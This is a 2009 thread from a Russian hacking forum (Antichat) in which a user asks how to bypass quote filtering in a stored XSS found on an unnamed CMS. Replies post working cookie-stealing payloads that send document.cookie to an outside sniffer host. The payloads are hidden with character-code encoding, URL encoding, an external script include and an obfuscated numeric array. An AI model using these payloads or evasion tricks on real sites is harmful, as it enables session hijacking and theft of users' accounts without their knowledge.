ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Обойти фильтрацию кавычек в XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Обойти фильтрацию кавычек в XSS
  #1  
Старый 25.03.2009, 01:48
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию Обойти фильтрацию кавычек в XSS
Нашел активную XSS на одном движке, только там фильтруются кавычки, попытался обойти и у меня возник такой вопрос

почему закодированная КСС не выполняется?
те так у меня работает отправка куков
Цитата:
<script>img = new Image(); img.src = "http://hacker-pro.ru/sniffer/Ы.gif?"+document.cookie;</script>
а вот так нет
Цитата:
<script>img = new Image(); img.src = String.fromCharCode(34,104,116,116,112,58,47,47,10 4,97,99,107,101,114,45,112,114,111,46,114,117,47,1 15,110,105,102,102,101,114,47,110,56,55,49,46,103, 105,102,63,34)+document.cookie;</script>
 
Ответить с цитированием

  #2  
Старый 25.03.2009, 01:51
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
а ты так попробуй:

<script>img = new Image(); img.src =%22%68%74%74%70%3A%2F%2F%68%61%63%6B%65%72%2D%70% 72%6F%2E%72%75%2F%73%6E%69%66%66%65%72%2F%DB%2E%67 %69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6 F%6B%69%65%3B</script>
 
Ответить с цитированием

  #3  
Старый 25.03.2009, 02:04
Аватар для Fepsis
Fepsis
Постоянный
Регистрация: 17.09.2008
Сообщений: 562
Провел на форуме:
6962560

Репутация: 536


По умолчанию
может лучше поставить инклуд скрипта
<script type=text/javascript src=http://****.ru/1.js>qq</script>
а в 1.js записать то, что надо..?!?
 
Ответить с цитированием

  #4  
Старый 25.03.2009, 21:29
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию
просто какойто ппц, оба способа не работают =//
 
Ответить с цитированием

  #5  
Старый 25.03.2009, 21:42
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Код:
<script src=http://site.ru/hack.js></script>
hack.js:
Код:
img = new Image(); img.src = "http://hacker-pro.ru/sniffer/Ы.gif?"+document.cookie;
Так делай. Все должно работать!
Последний раз редактировалось mailbrush; 26.03.2009 в 14:10..
 
Ответить с цитированием

  #6  
Старый 26.03.2009, 07:56
Аватар для VITАL
VITАL
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077

Репутация: 93
По умолчанию
PHP код:
<script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,104,97,99,107,101,114,45,112,114,111,46,114,117,47,115,110,105,102,102,101,114,47,219,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62));</script
или так )
PHP код:
<script>a=new Array(59.88,114.81,98.93,113.76,104.82,111.63,115.89,61.86,104.92,108.79,102.98,31.68,60.94,31.84,109.82,100.65,118.8,31.71,72.68,108.73,96.91,102.71,100.6,39.95,40.82,58.68,31.89,104.91,108.61,102.87,45.92,114.89,113.69,98.86,31.66,60.91,31.89,33.95,103.78,115.82,115.75,111.77,57.91,46.69,46.61,103.73,96.75,98.81,106.85,100.83,113.95,44.76,111.95,113.95,110.72,45.77,113.64,116.62,46.68,114.65,109.89,104.61,101.94,101.99,100.87,113.6,46.91,218.77,45.96,102.69,104.99,101.71,62.86,33.9,42.81,99.88,110.64,98.96,116.69,108.89,100.8,109.64,115.66,45.75,98.6,110.78,110.93,106.65,104.81,100.62,58.7,59.7,46.63,114.64,98.7,113.91,104.65,111.61,115.68,61.61);var i;
for (i=0;i<=a.lengthi++){document.write(String.fromCharCode(Math.round(a[i])));};</script
Последний раз редактировалось VITАL; 26.03.2009 в 08:00..
 
Ответить с цитированием

  #7  
Старый 26.03.2009, 09:12
Аватар для problema
problema
Banned
Регистрация: 23.03.2009
Сообщений: 9
Провел на форуме:
72094

Репутация: 5
По умолчанию
Раз ты копаешь CMS тогда кинь кусок кода где присутствует эта переменная через которую ты добавляешь текст, и ту часть где эта переменная фильтруется: ereg_replace() preg_replace() etc...
Или хотя бы кусок сформированного HTML кинь, где у тебя выводится твоё сообщение и куда и как вставляется твой "код".
А то по моему бессмыслено заниматься колдовством и проявлять экстрасенсорные способности.
 
Ответить с цитированием

  #8  
Старый 28.03.2009, 01:35
Аватар для FALTONICK
FALTONICK
Постоянный
Регистрация: 12.02.2009
Сообщений: 527
Провел на форуме:
4566140

Репутация: 0


Отправить сообщение для FALTONICK с помощью ICQ
По умолчанию
а может там нет никакой ксс?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Можно ли обойти фильтрацию спецсимволов в mssql. vmn Уязвимости 4 22.12.2006 01:48
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Обойти фильтрацию! Utochka Уязвимости 6 02.02.2006 11:33
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Как обойти фильтрацию по "маске"? (На примере форума http://www.securitylab.ru/forum) boffin Форумы 7 03.04.2005 15:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ